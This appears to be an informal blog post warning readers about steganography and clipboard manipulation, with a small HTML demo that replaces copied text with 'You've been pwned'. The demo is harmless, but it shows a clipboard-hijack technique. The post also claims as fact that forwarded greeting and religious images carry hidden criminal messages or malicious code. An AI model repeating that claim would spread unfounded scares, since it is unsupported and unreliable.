Steganography and its looming threats
If you search “Steganography” in the wiki you’ll get the bookish definition as “Steganography (/ˌstɛɡəˈnɒɡrəfi/ ⓘ STEG-ə-NOG-rə-fee) is the practice of representing information within another message or physical object, in such a manner that the presence of the concealed information would not be evident to an unsuspecting person’s examination. In computing/electronic contexts, a computer file, message, image, or video is concealed within another file, message, image, or video.”
In simple words “hiding in plain-sight”
So such a complicated and ‘foreign’ word why do we need to learn about it??? Because this simple thing can legit create havoc and catastrophe both in personal lives and in societies. Let’s delve deeper.
Image Steganography
Before starting, have you received those annoying WhatsApp, Facebook messages??? Like ‘Good Morning’, ‘If you don’t forward it you will fail’, Rumours or those annoying religious posts where if you don’t circulate the image you will be cursed???
Have you wondered why are those created?? Are they bots?? Well actually no. They have hidden messages or malicious codes hidden inside them. Go to the website:
try it for yourself to encode and decode a code into a picture. It could be your new “War Game”
Here’s an explanation how it is used (You can skip to the next section if this bore you ,but it will clarify the context further).
When ‘Bad People’ want to communicate with each other they can’t interact directly otherwise it could be intercepted and an arrest will be issued. So they create/generate a very controversial image(Religious Post or Rumours, things that can be spread easily) and embed the following messages ,codes or plans into it, which can be sent indirectly to the target by making people forward it to each other. The image after received by the receiver are decoded by their personal de-steganographer and then de-coder. So, next time if you receive any such message don’t panic,try to break the chain. If you wanna feel like a detective try to decode it using online tools and logic.
Clipboard Manipulation
Before explaining this concept let’s start with an experiment. Open notepad and paste the code below and save it as <file_name>.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Clipboard Manipulation</title>
<script>
function interceptCopy(event) {
event.preventDefault(); // Prevent default copy action
const textToCopy = "You've been pwned"; // Text2
event.clipboardData.setData('text/plain', textToCopy); // Override clipboard data
}
</script>
</head>
<body>
<p id="text1">
Cut, copy, and paste are essential commands of modern human–computer interaction and user interface design.
They offer an interprocess communication technique for transferring data through a computer's user interface.
The cut command removes the selected data from its original position, and the copy command creates a duplicate;
in both cases, the selected data is kept in temporary storage called the clipboard.
Clipboard data is later inserted wherever a paste command is issued. The data remains available to any application
supporting the feature, thus allowing easy data transfer between applications.
</p>
<script>
// Attach the copy event to the document
document.addEventListener('copy', interceptCopy);
</script>
</body>
</html>Run the HTML page with your fav browser. You’ll get a web-page opened. Try to copy it and paste it somewhere else.
Did you notice something??? Try it again. What !!!!
You are copying something but something else is printed!!! What is this???
This is called clipboard manipulation. Let’s delve deep into this topic. Suppose you get a problem on your OS you try to search it online and after several hit and fail you come across a very shady website which guarantees to solve the problem and suggests you a code which the writer asks you to paste it into your terminal/Powershell and run it with sudo/Administrator privileges and you run. BOOM !!! Your system gets compromised it gets infected with a virus or even worse a REVERSE SHELL !!!!
Try to go to legit websites only or if you are desperate use VirusTotal or simply just paste it somewhere else and check it.
Text Steganography
This one is a bit tough and can be false-positives on 60% of the cases but that’s what give it that particular edge. For example,
Papa watered tin plane shed !!!
the above text doesn’t seem that suspicious but if you focus on the bold letters and arrange them you will get Pwned!!
Next time if you find a weird text with haphazard editing or some weird cryptic meaning or some elementary Grammatical error don’t ignore it, again try to break the chain, report it.
Video Steganography
Okay this is a bit of confusing there are actually two types of video steganography. First one a video is embedded into an image or another file and on the Second one the frames at a particular pattern has message encoded into it.
For the first one let’s visit the link https://github.com/anilsathyan7/Deep-Video-Steganography-Hiding-Videos-in-Plain-Sight/blob/master/README.md
The second type is a bit complicated and probably can’t be done by online tools and require personal algorithms.
Try to look out for the size of the images before forwarding them, generally the images have sizes in kb unless it is edited or from IPhone…you get it right? Imagine a picture which is like from 2000s and has a resolution of 144p but its size is 40 MB….Yikes !!! Doesn’t look spooky at all
Audio Steganography
Have you ever got some distorted audios like someone had put a monster magnet on a HDD??? And ignored it. Well look back and look again it might be a SECRET MESSAGE that you might be accidentally intercepted or were you an unknowing medium of a transfer. Try the link below yourself
Conclusion
Let me tell you not-so-secret Secret. PRIVACY IS A MYTH. In this world of complicated interwoven world nobody is completely safe and could be compromised at any time just the opportunity awaits.
So don’t be naïve block unknown senders from all of your social medias, and if you receive such media, break the change and report to the authorities immediately.
Stay safe keep safe
